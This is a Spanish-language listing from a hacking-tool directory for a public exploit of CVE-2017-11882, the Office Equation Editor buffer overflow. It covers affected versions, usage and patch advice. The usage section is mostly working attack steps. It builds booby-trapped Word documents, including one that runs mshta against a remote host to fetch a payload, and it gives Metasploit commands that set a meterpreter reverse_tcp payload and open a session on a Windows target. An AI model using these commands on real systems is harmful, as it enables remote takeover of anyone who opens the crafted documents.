Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-11882 — CVE-2017-11882 (bypass universal de Office 2003 a 2016) | Kitploit
Herramientas/GitHubGitHub/littlebin404/cve-2017-11882
Frameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHublittlebin404/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 (bypass universal de Office 2003 a 2016)

Ver Repositorio
53hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Resumen de CVE-2017-11882

Desde el punto de vista del efecto de explotación, puede vulnerar todas las versiones de Office, de 2003 a 2016, y la construcción de todo el entorno de ataque es muy sencilla. Esta vulnerabilidad es causada por el [Editor de ecuaciones] presente en el software de Office. Debido a que el proceso del editor no valida la longitud del nombre, se produce un desbordamiento de búfer. El atacante puede lograr la ejecución de código arbitrario mediante la construcción de caracteres especiales. Por ejemplo, si un hacker aprovecha esta vulnerabilidad para crear un archivo de Office con una puerta trasera (shell), cuando un usuario común abre ese archivo de Office, el ordenador puede ser controlado directamente por el hacker.

Versiones afectadas:

root@kitploit:~
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

Uso

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Image

Al hacer clic en el archivo "test.doc" generado, se abre correctamente la calculadora.

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc

Image

Image

Se genera correctamente el archivo de Word 11882-3.doc.

Coloque el archivo cve_2017_11882.rb en el directorio /usr/share/metasploit-framework/modules/exploits/windows/smb:

root@kitploit:~
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit

Inicie el modo de escucha:

Image

Al hacer clic en el archivo 11882-3.doc en la máquina objetivo con Windows 7, ¡se obtienen sessions con éxito!

Image

Mitigación de la vulnerabilidad

① Actualización en línea; active las actualizaciones de Windows Update. Este método es suficiente para la mayoría de las personas.

② Instalar el parche; la dirección del parche de Microsoft correspondiente a esta vulnerabilidad es: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

Descargar herramienta